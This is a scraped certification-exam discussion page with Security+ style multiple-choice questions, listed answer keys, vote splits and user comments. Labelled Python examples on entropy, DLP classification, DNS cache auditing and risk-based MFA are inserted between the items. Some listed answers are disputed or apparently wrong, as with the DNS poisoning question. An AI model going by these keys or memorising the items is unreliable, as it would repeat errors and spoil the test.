handlers are used to compromise hundreds or thousands or millions of hosts with DoS tools (bots) forming a botnet.

The internal network has not been affected by the attack.


upvoted 19 times

  varun0 5 months ago


Agreed
upvoted 2 times

  ronniehaang Most Recent  4 days, 21 hours ago


Selected Answer: C
C. DDoS attack.

A Distributed Denial of Service (DDoS) attack is a type of cyber attack in which multiple compromised computers are used to flood a targeted
system with high volumes of traffic, overloading it and making it unavailable for its intended users. If the targeted system is an internet-facing
application, it could result in degraded response times or even complete unavailability. In such cases, the internal network performance may not
be degraded, but the internet-facing application would be impacted by the increased traffic from the DDoS attack.
upvoted 1 times

  DALLASCOWBOYS 6 days, 10 hours ago


B. MAC Flooding. In MAC Flooding the attacker is not getting into the path between the client and server. Question states internal network was
not degraded. DDoS denies service. The question stated performance was degraded, not denied.
upvoted 1 times

  duagreg 2 months ago


DDoS for sure
upvoted 1 times

  Iamboolean 4 months, 3 weeks ago


Selected Answer: C
Answer C = Distributed Denial Of Service.
upvoted 1 times

  comeragh 5 months ago


Good spot stoneface
upvoted 1 times

  varun0 5 months ago


Selected Answer: C
DDOS seems obvious to me.
upvoted 3 times


Question #39 Topic 1

Which of the following will increase cryptographic security?

A. High data entropy

B. Algorithms that require less computing power

C. Longer key longevity

D. Hashing

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
Entropy is a measure of disorder. A plaintext will usually exhibit low entropy as it represents a message in a human language or programming
language or data structure. The plaintext must be ordered for it to be intelligible to a person, computer processor, or database. One of the
requirements of a strong cryptographic algorithm is to produce a disordered ciphertext. Put another way, the ciphertext must exhibit a high level
of entropy. If any elements of order from the plaintext persist, it will make the ciphertext vulnerable to cryptanalysis, and the algorithm can be
shown to be weak.
upvoted 38 times

  Iamboolean 4 months, 3 weeks ago


Very good explanation, thanks!
upvoted 1 times
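The explanation above (plaintext is ordered and low-entropy, good ciphertext is disordered and high-entropy, and any order that survives encryption is a weakness) can be measured directly. The following is an added example, not code from the thread: it computes the empirical Shannon entropy of a constructed English plaintext, of the same text under a single-byte XOR "cipher" that merely relabels byte values, and of the text under a pseudorandom keystream built from SHA-256. The keystream construction and the demo key are illustrative, not a vetted cipher.

```python
"""Empirical Shannon entropy of plaintext versus two ciphertexts.

Added example, not from the ExamTopics thread. The keystream construction
(SHA-256 over key || counter) is an illustration of a high-entropy output,
not a vetted cipher; production code should use a reviewed AEAD.
"""
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte of the byte histogram; 8.0 is the maximum."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def single_byte_xor(data: bytes, key: int) -> bytes:
    """A 'cipher' that permutes byte values but keeps the plaintext's structure."""
    return bytes(b ^ key for b in data)


def keystream(key: bytes, length: int) -> bytes:
    """Constructed keystream: concatenated SHA-256(key || 64-bit counter) blocks."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def stream_encrypt(data: bytes, key: bytes) -> bytes:
    """XOR the data with a pseudorandom keystream derived from `key`."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


# Constructed plaintext: ordinary English, repeated to get a few kilobytes.
PLAINTEXT = (
    "A plaintext will usually exhibit low entropy because it is a message in a "
    "human language; a few letters such as e, t and a dominate the byte histogram "
    "and spaces appear roughly every five characters. "
).encode() * 16

DEMO_KEY = b"constructed-demo-key-not-for-real-use"


def compare() -> dict:
    """Entropy of the plaintext and of two encryptions of it, in bits per byte."""
    return {
        "plaintext": shannon_entropy(PLAINTEXT),
        "single_byte_xor": shannon_entropy(single_byte_xor(PLAINTEXT, 0x5A)),
        "stream_cipher": shannon_entropy(stream_encrypt(PLAINTEXT, DEMO_KEY)),
    }


if __name__ == "__main__":
    for name, bits in compare().items():
        print(f"{name:16s} {bits:.3f} bits/byte")
```

The plaintext lands around 4 bits per byte, the single-byte XOR output has exactly the same entropy because a byte-for-byte substitution preserves the histogram (frequency analysis still works on it), and the keystream output sits close to the 8-bit ceiling. A histogram test like this is only a sanity check: it cannot distinguish a strong cipher from a weak one whose output merely looks uniform, so it should be read as a necessary condition, not a proof of strength.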

  varun0 Highly Voted  5 months ago


Selected Answer: A
Entropy seems obvious to me.
upvoted 5 times

  ronniehaang Most Recent  4 days, 21 hours ago


Selected Answer: A
A. High data entropy

High data entropy refers to the unpredictability and randomness of data used as input to a cryptographic system. The higher the entropy, the
more difficult it is for an attacker to guess the input data, thereby increasing the cryptographic security of the system.

For example, in a password-based encryption system, high entropy in the password input would result in a more secure encryption key, making it
more difficult for an attacker to crack the encryption and access the protected data.
upvoted 1 times

  DALLASCOWBOYS 6 days, 10 hours ago


A. high data entropy. The higher the randomness, the greater the security.
upvoted 1 times

  CL_QRT 3 weeks, 4 days ago


A is the answer
upvoted 1 times

  03allen 4 months ago


Anyone can tell me why C and D are not right? It doesn't say the best one, right?
upvoted 1 times

  lordguck 3 months ago


C decreases security, as it gives attackers more time to break/use (e.g. if stolen and no one noticed) the keys.
D is not applicable, as the question already talks about cryptographic security and this includes, for all relevant methods in use, ways to detect
tampering.
upvoted 1 times

  lordguck 3 months ago


Sorry, I was wrong here due to a misunderstanding of the used term "key longevity". "Longevity" refers to the trust one has in the qualities
(e.g. time to break) of an encryption method (Topic 5C handbook) and NOT to the lifetime of a certificate ("key" got me there).
Nevertheless I vote for A, as C "longevity" is not measurable in contrast to A.
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago


The keyword in the question is “Increase”. Increase = best one.


upvoted 1 times

  Ay_ma 4 months, 2 weeks ago


Selected Answer: A
High data entropy: In cryptography, entropy is used to produce random numbers, which in turn are used to produce security keys to protect data
while it's in storage or in transit. The greater the quality of random number generation (RNG), the greater the quality of random keys produced,
and thus the higher the security value of the key
upvoted 4 times


Question #40 Topic 1

Which of the following statements BEST describes zero-day exploits?

A. When a zero-day exploit is discovered, the system cannot be protected by any means.

B. Zero-day exploits have their own scoring category in CVSS.

C. A zero-day exploit is initially undetectable, and no patch for it exists.

D. Discovering zero-day exploits is always performed via bug bounty programs.

Correct Answer: C

Community vote distribution


C (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: C
I'll go with C.

A says it can be protected by ANY means which is not true, sure the exploit itself doesn't have a patch yet but we can isolate the effected system
or have some kind of compensating control in place.
upvoted 10 times

  ronniehaang Most Recent  4 days, 21 hours ago


Selected Answer: C
C. A zero-day exploit is initially undetectable, and no patch for it exists.

A zero-day exploit refers to a type of cyber attack that utilizes a previously unknown vulnerability in software or hardware that hasn't been
identified or fixed by the manufacturer. As a result, there is no existing protection or patch to defend against it, making it a significant risk to
organizations and individuals. When a zero-day exploit is discovered, the first priority is to alert the vendor and hope that they can develop a
patch as quickly as possible.
upvoted 1 times

  DALLASCOWBOYS 6 days, 10 hours ago


C. Zero-day attacks are attacks that exploit a vulnerability that is unknown, therefore no patch is available.
upvoted 1 times

  KingDrew 3 weeks, 3 days ago


Selected Answer: C
Zero-day = Never seen before attack
Therefore it cannot be patched or recognized in a database if it has not occurred or been documented before.
upvoted 1 times

  Iamboolean 4 months, 3 weeks ago


Selected Answer: C
Answer C = A zero-day exploit is initially undetectable, and no patch for it exists.

The other closest answer could be -->


"A = When a zero-day exploit is discovered, the system cannot be protected by any means."

However, this statement is not precise as it implies the system cannot be protected by any means, which is not true.

Other answers are not as precise. Therefore, answer corresponds to letter C in my opinion...
upvoted 1 times

  comeragh 5 months ago


Selected Answer: C
Agree with C being the best choice answer here
upvoted 2 times


Question #41 Topic 1

A company wants to restrict emailing of PHI documents. The company is implementing a DLP solution. In order to restrict PHI documents, which
of the following should be performed FIRST?

A. Retention

B. Governance

C. Classification

D. Change management

Correct Answer: C

Community vote distribution


C (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: C
Data has to be first classified for the DLP to know which data can leave the network and which can't.
upvoted 12 times

  DALLASCOWBOYS Most Recent  6 days, 9 hours ago


C. Classification. Data classification is the primary means by which data is protected based on its need for secrecy, sensitivity and confidentiality.
upvoted 1 times

  IYKMba 3 months ago


Selected Answer: C
Classification is the first step to determine what data contains PHI
upvoted 2 times

  xxxdolorxxx 2 weeks ago


This is sort of what I'm thinking. Before knowing how to stop PHI from leaving...need to know exactly what data has PHI.
upvoted 1 times

  hackerguy 3 months, 1 week ago


Selected Answer: C
Data Classification:
Category based on the value to the organization and the sensitivity of the
information if it were to be disclosed
upvoted 1 times

  [Removed] 5 months ago


Classification, sure... But I also think Change management, because changing any sort of business process typically starts with that.
upvoted 2 times

  Gravoc 4 months, 2 weeks ago


Change management doesn't make sense in this context, because its asking what needs to be implemented first to assist the DPL in
preventing PHI from being emailed. Classification is the first thing the DLP needs to properly do it's job. Change management would be like
going through the approval process to add DLP as a tool to your security framework. In this case, the question already informed us that the
DLP is in place. Meaning we can assume that the change management approval process has already been completed in regards to the DLP,
and any implications imposed by the DLP. You wouldn't approve the use of the DLP without also approving the classification of sensitive and
proprietary information.
upvoted 2 times
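The ordering the thread settles on (classify first, then let the DLP rule act on the label) is clearer in code, because the enforcement function has nothing to decide until a label exists. The following is an added example, not the question's DLP product or any vendor's code: a small classifier that labels a document PHI only when it carries both a patient identifier and health context, and an outbound-email rule that keys purely off that label. The identifier patterns, health terms, sample documents and the internal domain example.com are all constructed.

```python
"""Classify documents for PHI first, then let the DLP policy act on the label.

Added example, not from the ExamTopics thread. The identifier patterns, health
terms, sample documents and the internal domain example.com are constructed;
a real deployment would use the organisation's own classification scheme.
"""
import re

INTERNAL_DOMAIN = "example.com"   # assumed company mail domain

# Constructed identifier shapes. A real DLP ruleset would be broader.
IDENTIFIER_PATTERNS = {
    "mrn": re.compile(r"\bMRN[- ]?\d{6,10}\b", re.IGNORECASE),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}
HEALTH_TERMS = ("patient", "diagnosis", "prescription", "treatment", "lab result")


def classify(text: str) -> str:
    """Assign one label. PHI needs an identifier *and* health context, so that a
    payroll sheet with SSNs is PII, not PHI, and a newsletter with no
    identifiers is never blocked."""
    identifiers = {name for name, pat in IDENTIFIER_PATTERNS.items() if pat.search(text)}
    lowered = text.lower()
    health_context = any(term in lowered for term in HEALTH_TERMS)
    if identifiers and health_context:
        return "PHI"
    if identifiers:
        return "PII"
    if health_context:
        return "INTERNAL"
    return "PUBLIC"


def email_decision(text: str, recipient: str) -> dict:
    """Apply the outbound-email rule to an attachment. Only the label and the
    recipient domain drive the decision, which is why classification has to
    exist before the rule can be written."""
    label = classify(text)
    domain = recipient.rsplit("@", 1)[-1].lower()
    external = domain != INTERNAL_DOMAIN
    if label == "PHI" and external:
        action = "block"
    elif label == "PII" and external:
        action = "quarantine"      # hold for review rather than hard block
    else:
        action = "allow"
    return {"label": label, "recipient_domain": domain, "action": action}


# Constructed sample documents.
SAMPLES = {
    "discharge_summary": "Patient J. Doe, MRN-00123456. Diagnosis: type 2 diabetes. Treatment plan attached.",
    "payroll_sheet": "Employee 4417, SSN 123-45-6789, pay grade 7.",
    "wellness_newsletter": "Tips for a healthy lunch and a reminder about the treatment of office plants.",
    "lunch_menu": "Friday: soup and sandwiches in the cafeteria.",
}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, email_decision(text, "reviewer@partner.example.org"))
```

Running the samples against an external recipient blocks the discharge summary, quarantines the payroll sheet and allows the other two; the same discharge summary sent to an example.com address is allowed. Note that the wellness newsletter matches a health term but carries no identifier, which is exactly the kind of document an identifier-only or keyword-only scheme would mislabel.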


Question #42 Topic 1

A security analyst is investigating some users who are being redirected to a fake website that resembles www.comptia.org. The following output
was found on the naming server of the organization:

Which of the following attacks has taken place?

A. Domain reputation

B. Domain hijacking

C. Disassociation

D. DNS poisoning

Correct Answer: B

Community vote distribution


D (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: D
DNS server cache poisoning aims to corrupt the records held by the DNS server itself. This can be accomplished by performing DoS against the
server that holds the authorized records for the domain, and then spoofing replies to requests from other name servers. Another attack involves
getting the victim name server to respond to a recursive query from the attacking host. A recursive query compels the DNS server to query the
authoritative server for the answer on behalf of the client.
upvoted 19 times
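Since the question's name-server output is not reproduced on this page, here is an added example (not the thread's or ExamTopics' code) of the check an analyst would run in that situation: compare what the recursive resolver is serving from cache against the zone's authoritative records. It flags the two symptoms of a poisoned entry, an answer that is not in the authoritative set and a remaining TTL larger than the authoritative TTL, which a genuinely cached answer can never have because cached TTLs only count down. The cache dump, TTLs and documentation-range addresses are constructed.

```python
"""Audit a resolver's cached answers against the zone's authoritative records.

Added example, not from the ExamTopics thread (the question's own server output
is not reproduced on this page). Record names, TTLs and the documentation-range
IP addresses below are constructed.
"""

# Authoritative data for the zone, keyed by (owner name, record type).
# Constructed values; in practice this is queried from the zone's
# authoritative servers or taken from the zone file.
AUTHORITATIVE = {
    ("comptia.org.", "NS"): {"ttl": 3600, "rdata": {"ns1.comptia.org.", "ns2.comptia.org."}},
    ("ns1.comptia.org.", "A"): {"ttl": 3600, "rdata": {"198.51.100.53"}},
    ("www.comptia.org.", "A"): {"ttl": 300, "rdata": {"198.51.100.10"}},
    ("mail.comptia.org.", "A"): {"ttl": 300, "rdata": {"198.51.100.20"}},
}

# Constructed dump of the recursive resolver's cache: "<name> <ttl> IN <type> <rdata>".
CACHE_DUMP = """\
comptia.org. 3412 IN NS ns1.comptia.org.
comptia.org. 3412 IN NS ns2.comptia.org.
ns1.comptia.org. 3412 IN A 198.51.100.53
www.comptia.org. 86400 IN A 203.0.113.66
mail.comptia.org. 271 IN A 198.51.100.20
"""


def parse_cache(dump: str):
    """Parse the dump into dicts; lines that do not fit the shape are skipped, not guessed."""
    records = []
    for line in dump.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[2] != "IN":
            continue
        name, ttl, _cls, rtype, rdata = parts
        records.append({"name": name, "ttl": int(ttl), "type": rtype, "rdata": rdata})
    return records


def audit_cache(dump: str, authoritative=AUTHORITATIVE):
    """Return (name, type, reason) findings for cached records that disagree with
    the authoritative data. Two checks:
      * rdata not in the authoritative set (the redirect itself);
      * remaining TTL above the authoritative TTL, which a genuinely cached
        answer can never have because cached TTLs only count down."""
    findings = []
    for rec in parse_cache(dump):
        auth = authoritative.get((rec["name"], rec["type"]))
        if auth is None:
            findings.append((rec["name"], rec["type"], "no authoritative record to compare against"))
            continue
        if rec["rdata"] not in auth["rdata"]:
            findings.append((rec["name"], rec["type"],
                             f"cached {rec['rdata']} is not in authoritative {sorted(auth['rdata'])}"))
        if rec["ttl"] > auth["ttl"]:
            findings.append((rec["name"], rec["type"],
                             f"cached TTL {rec['ttl']} exceeds authoritative TTL {auth['ttl']}"))
    return findings


if __name__ == "__main__":
    for name, rtype, reason in audit_cache(CACHE_DUMP):
        print(f"{name} {rtype}: {reason}")
```

On the constructed dump only the www record is reported, and it trips both checks: the NS, ns1 and mail entries agree with the zone, which is the pattern varun0 describes below where the forged name resolves differently from its neighbours. Flushing the bad entry is the immediate fix; keeping the resolver from accepting unsolicited answers (source-port and transaction-ID randomisation, DNSSEC validation where the zone is signed) is what stops it being re-poisoned.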

  JD2354 Most Recent  1 day, 19 hours ago


I agree with the crowd, answer d. why are so many "correct answers" actually incorrect on this?
upvoted 1 times

  nul8212 1 month, 2 weeks ago


Selected Answer: D
The answer is D.

Domain hijacking is where someone tries to register your domain, access your
hosted control panel, and set up a website that is similar to yours. This answer is wrong.
upvoted 1 times

Idkanything 2 months, 2 weeks ago
Selected Answer: D
D. DNS poisoning

Domain name to IP address entries in a DNS server are altered


upvoted 3 times

alayeluwa 3 months, 3 weeks ago
Selected Answer: D
Question gave you the answer: "Redirected to a fake website that resembles www.comptia.org"

DNS Poisoning it is.


upvoted 4 times

Bimtos 3 months, 3 weeks ago
Domain hijacking or domain theft is the act of changing the registration of a domain name without the permission of its original registrant, or by
abuse of privileges on domain hosting and registrar software systems.
upvoted 2 times


Fitzd 4 months, 3 weeks ago
what they are asking, and the example is off. Domain Hijacking or Domain Spoofing is an attack where an organization's web address is stolen by
another party. The other party changes the enrollment of another's domain name without the consent of its legitimate owner.
upvoted 1 times

Joe1984 5 months ago
DNS poisoning is the right answer
upvoted 1 times

varun0 5 months ago
Selected Answer: D
We can see that the www IP and the other name IP are different; the DNS cache has been modified to redirect the users.
upvoted 3 times

lordguck 3 months ago
D is right, but the DNS output does not show that, necessarily. Only the question gives you the answer in this case.
upvoted 1 times

Vishnuks 5 months ago
Answer D (DNS poisoning)
upvoted 3 times


Question #43 Topic 1

Which of the following describes the continuous delivery software development methodology?

A. Waterfall

B. Spiral

C. V-shaped

D. Agile

Correct Answer: D

Community vote distribution


D (100%)

rodwave Highly Voted 2 months, 3 weeks ago
Selected Answer: D
Answer: Agile

Agile methodology is a way to manage a project by breaking it up into several phases. It involves constant collaboration with stakeholders and
continuous improvement at every stage. Once the work begins, teams cycle through a process of planning, executing, and evaluating.
=======================================
Helpful Info:

Waterfall - A sequential development process that flows like a waterfall through all phases of a project (analysis, design, development, and
testing, for example), with each phase completely wrapping up before the next phase begins.
upvoted 9 times

mlonz 2 weeks, 5 days ago
Nice information Rodwave, you should try to add information for every question
thanks mate
upvoted 1 times

varun0 Highly Voted 5 months ago
Selected Answer: D
Agile seems right. It's a fast-paced life cycle which iterates features according to the user's feedback.
upvoted 9 times

scarceanimal Most Recent 1 day, 4 hours ago
I never heard of this once, not sure if it was in the exam objectives...
upvoted 1 times

ronniehaang 4 days, 21 hours ago
Selected Answer: D
D. Agile.

Continuous delivery is a software development methodology that is based on the principles of agile development. It emphasizes a rapid, iterative,
and frequent release cycle, where new features and bug fixes are delivered to customers on a regular basis. The goal of continuous delivery is to
ensure that code changes can be rapidly and reliably deployed to production, minimizing downtime and maximizing the value delivered to
customers. This approach relies on automation, collaboration, and communication to ensure that software is delivered quickly, with high quality,
and with minimal risk.
upvoted 1 times

DALLASCOWBOYS 6 days, 9 hours ago
D. Agile, in this methodology, updates are made continually, piece-by-piece, enabling software code to be delivered to customers as soon as it is
completed and tested.
upvoted 1 times

[Removed] 3 months, 3 weeks ago
Selected Answer: D
Agile approach to software development is to ensure customer satisfaction via early and continuous delivery of software.
upvoted 2 times

sucram 4 months, 1 week ago
SY0-501
upvoted 1 times


RonWonkers 4 months, 3 weeks ago
Selected Answer: D
Answer is D
upvoted 1 times


Question #44 Topic 1

Which of the following is the BEST example of a cost-effective physical control to enforce a USB removable media restriction policy?

A. Putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports

B. Implementing a GPO that will restrict access to authorized USB removable media and regularly verifying that it is enforced

C. Placing systems into locked, key-controlled containers with no access to the USB ports

D. Installing an endpoint agent to detect connectivity of USB and removable media

Correct Answer: B

Community vote distribution


B (48%) A (40%) 12%

rodwave Highly Voted 2 months, 3 weeks ago
Selected Answer: A
Answer: Putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports
=============================================
Explanation:

The question is asking for two specific requirements for the solution:
1. A solution that's cost-effective
2. A solution that's a physical control

The options to implement a GPO (B) and install an endpoint agent (D) are software-based implementations; while the GPO is cost-effective,
they do not address the physical control requirement for the solution.

Option C would address the requirement as a physical control by preventing users from physically accessing the USB port and is likely the best out
of all the given options; however, this option is not the cheapest, so it's not addressing the cost-effectiveness required for the solution.

Only option A would address each requirement of the solution being a cost-effective physical control that can be implemented.
upvoted 16 times

Nirmalabhi 2 months ago
absolutely agree with you. BTW your input on the discussion of the questions is phenomenal so thank you
upvoted 4 times

Hewn Highly Voted 4 months, 4 weeks ago
Selected Answer: B
It's pretty obviously B, I think y'all are getting too hung up on a physical control being 100% physical. A biometric scanner isn't useful without
some kind of software running that compares my signature to a known copy of whatever it's scanning, yet it is still considered a physical control.
upvoted 14 times

hanmai 2 days, 18 hours ago
From what I remember hearing in class, GPOs are considered to be both logical and physical.
upvoted 1 times

ronniehaang 4 days, 20 hours ago
Selected Answer: A
A. Putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports.

This is a cost-effective physical control to enforce a USB removable media restriction policy, as it physically blocks unauthorized access to the
USB ports, making it difficult for employees to insert unauthorized storage devices into the systems. The logging of port numbers and regular
inspection can help keep track of the tapes and detect any tampering or unauthorized access. This method is simple, low cost, and can be easily
implemented in most environments.
upvoted 1 times

zf1343 1 week ago
Those who vote for GPO should pay attention to: "restrict access to 'authorized' USB removable media".
GPO can disable removable media but not sure how it can recognize an 'authorized' USB from unauthorized one. A DLP solution can selectively
allow what can or cannot be copied to/from a USB drive.
upvoted 1 times

Red_Rum 1 week, 1 day ago
Selected Answer: A
physical and cheap, only option is A
upvoted 1 times

pa3cks 1 week, 3 days ago
D. Installing an endpoint agent to detect connectivity of USB and removable media


An endpoint agent is a software that is installed on each endpoint device, such as laptops, desktops, and servers, that is used to monitor and
control access to the device. By installing an endpoint agent, an organization can detect when a USB removable media is connected to a device
and then block or allow access to the device based on an organization's USB removable media restriction policy. This is a cost-effective method
as it allows for centralized management and monitoring of the USB removable media restriction policy, it can be done remotely and it allows for
real-time notifications of any unauthorized access attempts.
upvoted 1 times

sanlibo 2 weeks, 2 days ago
Selected Answer: B
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gpod/260b58dc-da14-400b-8b82-6abbfd529fbf
upvoted 1 times

rumblerally 3 weeks ago
If y'all wanna get crazy with the "physical control" part... technically "regularly verifying that it is enforced" is a physical control.
upvoted 1 times

LaoX 1 month ago
Selected Answer: B
I believe GPO is the most cost-effective method. You have to pay to buy Endpoint or antitamper tape.
upvoted 1 times

nul8212 1 month, 2 weeks ago
Selected Answer: B
The answer is B. Using antitamper tape is not a real solution, it could be cheaper, but it is not a real solution. If your boss asks what do you
recommend and you say to use antitamper tape, he will hire the janitor instead of you.
upvoted 4 times

[Removed] 1 month, 2 weeks ago
Lol Funny
upvoted 2 times

okay123 1 month, 3 weeks ago
Selected Answer: A
It has to be A, cause B is a technical control.
upvoted 2 times

PeP1T0 1 month, 4 weeks ago
Selected Answer: A
In my opinion it's A, because B is a logical control and C, although being another physical control, is not cost-effective.
upvoted 2 times

Sanjucbsa 2 months ago
Selected Answer: A
For physical control it has to be option A, otherwise option B.
upvoted 2 times

tek7ila 2 months, 1 week ago
Selected Answer: A
Yep, the only answer that meets both criteria (cheap & physical) is A!
upvoted 1 times

tek7ila 2 months, 1 week ago
Selected Answer: B
B <--- it has to be cheap :p Implementing GPO is free.
upvoted 3 times

tek7ila 2 months ago
Sorry, I did some reading and it has to be A. B is a technical control, the same as D.
Physical are A and C, but A is cheaper :) So it's 100% A.
upvoted 2 times

Kalender 2 months, 1 week ago
Selected Answer: A
Physically, the most logical measure is A
upvoted 1 times


Question #45 Topic 1

A company suspects that some corporate accounts were compromised. The number of suspicious logins from locations not recognized by the
users is increasing.
Employees who travel need their accounts protected without the risk of blocking legitimate login requests that may be made over new sign-in
properties. Which of the following security controls can be implemented?

A. Enforce MFA when an account request reaches a risk threshold.

B. Implement geofencing to only allow access from headquarters.

C. Enforce time-based login requests that align with business hours.

D. Shift the access control scheme to a discretionary access control.

Correct Answer: A

Community vote distribution


A (100%)

stoneface Highly Voted 5 months ago
Selected Answer: A
Enforce MFA is the most convenient way
upvoted 11 times

varun0 5 months ago
Agreed
upvoted 4 times

ronniehaang Most Recent 4 days, 20 hours ago
Selected Answer: A
A. Enforce MFA when an account request reaches a risk threshold.

Multi-Factor Authentication (MFA) is an effective security control to mitigate the risk of unauthorized access to corporate accounts. By requiring
an additional factor of authentication, such as a one-time code sent to a user's phone or a fingerprint scan, MFA can help prevent attackers from
accessing an account even if they have stolen a password. By implementing MFA only when an account request reaches a risk threshold, the
company can ensure that employees who travel and need their accounts protected will not be negatively impacted by the security control, while
still providing an extra layer of security for those accounts that are at higher risk of being compromised.
upvoted 1 times

KingDrew 3 weeks, 3 days ago
Selected Answer: A
MFA increases security because even if one credential becomes compromised, unauthorized users will be unable to meet the second
authentication requirement and will not be able to access the targeted physical space, computing device, network, or database.
upvoted 2 times

rodwave 2 months, 3 weeks ago
Selected Answer: A
Answer: Enforce MFA when an account request reaches a risk threshold.

This is likely the most convenient implementation that would work for all employees, as an additional element(s) would be needed for
authentication/authorization.
========================
(B) - Implementing geofencing to only allow access from headquarters might stop the suspicious logins, however, it would be inconvenient for
employees not physically located near headquarters such as the traveling employees.

(C) Enforcing time-based login requests to align with business hours could also be inconvenient for traveling/global employees that work at
different times compared to the business's normal business hours.

(D) With Discretionary access control, the owner of a resource can decide who can have access to the resource and you can modify the access
at any time. The option to shift the access control scheme to a discretionary access control wouldn't really address the login issue either if the
account of someone who is authorized to access a resource was compromised. The attacker can still access the resource using their credentials.
upvoted 3 times
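Risk-based step-up as an added example (not part of the question or of any comment above): the scoring weights, the threshold, the user and the coordinates are constructed assumptions, and the point is that a risky sign-in gets an MFA challenge instead of a block, which is what keeps a travelling employee from being locked out.

```python
"""Risk-based step-up authentication for sign-ins.

Added example, not from the exam page or any vendor product: each sign-in is
scored against what is already known about the user (countries, devices, the
previous sign-in), and MFA is required only when the score reaches a
threshold. A login is never denied outright, so a traveller signing in from a
new country is challenged rather than locked out. All scores, thresholds,
users and coordinates below are constructed for illustration.
"""
from dataclasses import dataclass, field
from datetime import datetime
from math import asin, cos, radians, sin, sqrt
from typing import Dict, List, Optional, Set, Tuple


@dataclass
class Login:
    user: str
    when: datetime
    country: str
    lat: float
    lon: float
    device_id: str


@dataclass
class History:
    """What the identity provider already knows about one user (constructed)."""
    known_countries: Set[str] = field(default_factory=set)
    known_devices: Set[str] = field(default_factory=set)
    last_login: Optional[Login] = None


# Constructed weights: one new signal stays below the threshold; two signals
# or an impossible-travel hit pushes the sign-in into step-up.
NEW_COUNTRY = 30
NEW_DEVICE = 25
IMPOSSIBLE_TRAVEL = 60
MFA_THRESHOLD = 50
MAX_PLAUSIBLE_KMH = 1000  # faster than any commercial flight


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in kilometres between two points."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi = radians(lat2 - lat1)
    dlmb = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def risk_score(login: Login, hist: History) -> Tuple[int, List[str]]:
    """Return the additive risk score and the signals that produced it."""
    score, reasons = 0, []
    if login.country not in hist.known_countries:
        score += NEW_COUNTRY
        reasons.append("new country")
    if login.device_id not in hist.known_devices:
        score += NEW_DEVICE
        reasons.append("new device")
    prev = hist.last_login
    if prev is not None:
        hours = (login.when - prev.when).total_seconds() / 3600
        km = haversine_km(prev.lat, prev.lon, login.lat, login.lon)
        # Impossible travel: the distance since the previous sign-in could
        # not have been covered at any plausible speed.
        if hours > 0 and km / hours > MAX_PLAUSIBLE_KMH:
            score += IMPOSSIBLE_TRAVEL
            reasons.append("impossible travel")
    return score, reasons


def decide(login: Login, hist: History) -> str:
    """'allow' or 'mfa': step-up only, never a hard block of the sign-in."""
    score, _ = risk_score(login, hist)
    return "mfa" if score >= MFA_THRESHOLD else "allow"


def record(login: Login, hist: History) -> None:
    """After a sign-in succeeds (MFA passed if required), learn from it."""
    hist.known_countries.add(login.country)
    hist.known_devices.add(login.device_id)
    hist.last_login = login


def demo() -> Dict[str, str]:
    """Constructed scenarios for a user whose baseline is New York on one laptop."""
    hist = History()
    record(Login("alice", datetime(2023, 1, 23, 9, 0), "US", 40.71, -74.01, "laptop-01"), hist)
    cases = {
        # Same city, same device, an hour later: nothing unusual.
        "same_place": Login("alice", datetime(2023, 1, 23, 10, 0), "US", 40.71, -74.01, "laptop-01"),
        # London a day later on the known laptop: plausible business travel.
        "travel_known_device": Login("alice", datetime(2023, 1, 24, 9, 0), "GB", 51.51, -0.13, "laptop-01"),
        # London a day later on an unknown phone: two signals, step up.
        "travel_new_device": Login("alice", datetime(2023, 1, 24, 9, 0), "GB", 51.51, -0.13, "phone-77"),
        # Sydney two hours after New York: impossible travel, step up.
        "impossible_travel": Login("alice", datetime(2023, 1, 23, 11, 0), "AU", -33.87, 151.21, "laptop-01"),
    }
    return {name: decide(login, hist) for name, login in cases.items()}


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:20s} -> {outcome}")
```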


Question #46 Topic 1

An organization wants to participate in threat intelligence information sharing with peer groups. Which of the following would MOST likely meet
the organization's requirement?

A. Perform OSINT investigations.

B. Subscribe to threat intelligence feeds.

C. Submit RFCs.

D. Implement a TAXII server.

Correct Answer: D

Community vote distribution


D (92%) 8%

Boogie_79 Highly Voted 5 months, 1 week ago
Selected Answer: D
A TAXII server is a client that exchanges standardized and anonymized cyber threat intelligence among users. It works as a venue for sharing and
collecting Indicators of compromise, which have been anonymized to protect privacy.
upvoted 17 times

DALLASCOWBOYS Most Recent 6 days, 9 hours ago
D. Implementing a TAXII server helps organizations exchange structured threat information relating to indicators of compromise.
upvoted 2 times

akingokay 1 month, 3 weeks ago
Selected Answer: D
agree to D
upvoted 1 times

yasuke 3 months, 1 week ago
Trusted Automated Exchange of Intelligence Information (TAXII™) is an application protocol for exchanging CTI over HTTPS. TAXII defines a
RESTful API and a set of requirements for TAXII Clients and Servers.
upvoted 4 times

varun0 5 months ago
Selected Answer: D
Sharing threat information

I'll go with TAXII server


upvoted 4 times

stoneface 5 months ago
Selected Answer: B
It isn't typical for organizations to build TAXII servers, unless they are a security vendor, but they often connect to TAXII servers to download
threat intelligence documented in the STIX taxonomy. MISP can be configured to do this.
upvoted 2 times

Jakalan7 4 months, 2 weeks ago
Yes, but the question states they would like to "participate in threat intelligence information sharing", so the answer must be D, TAXII server. If
